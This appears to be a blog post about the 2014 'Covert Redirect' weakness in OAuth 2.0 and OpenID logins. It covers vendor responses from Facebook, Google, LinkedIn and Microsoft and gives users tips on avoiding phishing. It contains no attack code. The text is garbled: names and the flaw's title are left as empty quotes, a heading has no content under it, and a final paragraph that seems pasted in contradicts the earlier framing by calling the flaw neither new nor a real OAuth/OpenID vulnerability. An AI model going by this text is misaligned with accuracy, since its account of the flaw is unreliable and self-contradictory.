







What is Covert Redirect?

Covert Redirect is a flaw that exist in the Open Source Software, in the login tools OAuth and OpenID. Covert Redirect flaw can masquerade as a login popup based on an affected site's domain.





What is OAuth and OpenID ?





Wang says that the about all the major organisation sites is being affected by this vulnerability, which includes- Facebook, Google, Yahoo, LinkedIn, Microsoft, Paypal etc... Wang have also reported the vulnerability to all the giants but have got unexpected response form all of them.









Response of the Reports-





Facebook:- Company "understood the risks associated with OAuth 2.0," and that "short of forcing every single application on the platform to use a whitelist," fixing this bug was "something that can't be accomplished in the short term."





Google:- Google says that they have tracked the issue.





LinkedIn:- The company will publish a blog on the matter soon.





Microsoft:- Microsoft, said that an investigation had been done and that the vulnerability existed on a the domain of a third-party and not on its own sites.





Wang mentioned that,

"Patching this vulnerability is easier said than done. If all the third-party applications strictly adhere to using a whitelist, then there would be no room for attacks,". "However, in the real world, a large number of third-party applications do not do this due to various reasons. This makes the systems based on OAuth 2.0 or OpenID highly vulnerable."





How To Prevent it ?





As the issue is not similar to Heartbleed, but this could affect the large amount of users. It is easy to practice the vulnerability unless it is patched. It will cost to fixed the issue, as third party site didn't have much financial source, but the host company (such as Facebook) bears the responsibility for making the attacks appear more credible.

After the major security flaw in internet "" another major flaw has been found in popular open-source security software. This time, the holes have been found in the login tools OAuth and OpenID , used by many websites and tech titans including Google, Facebook, Microsoft, and LinkedIn, among others.A Ph.D student of Nanyang Technological University in Singapore, "" have discover the critical vulnerability dubbed as "" the flaw could enable phishing sites to grab a user's login information.Fortunately, Covert Redirect is not the next Heartbleed . In fact, from what we can ascertain, the Covert Redirect "flaw" isn't even new. Moreover, classifying Covert Redirect as a vulnerability with OAuth 2.0 and OpenID is incorrect. OAuth is an open standard for authorization. It's designed as a way for users to sign in or sign up for other services using an existing identity of a site such as Google, Facebook, Microsoft or Twitter. OpenID is a similar protocol also used for single sign-on (SSO).These protocols are what companies use to make it easy to sign in for multiple services without having to create several new accounts., founder and interim CEO at WhiteHat Security, a website security firm, have given the positive response to Wang finding and appreciate his works.Users who wish to avoid any potential loss of data should be careful about clicking links that immediately ask you to log in to Facebook or Google. Closing the tab immediately should prevent any redirection attacks. To avoid offering up information to a malicious website, users should only log into Facebook or other services through sites that they trust. If users finds something different or sketchy, don't do any thing on the page.